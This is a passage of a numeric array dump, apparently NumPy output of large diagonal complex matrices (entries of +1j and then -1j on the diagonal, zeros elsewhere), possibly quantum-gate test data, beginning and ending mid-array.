0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]),
7: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
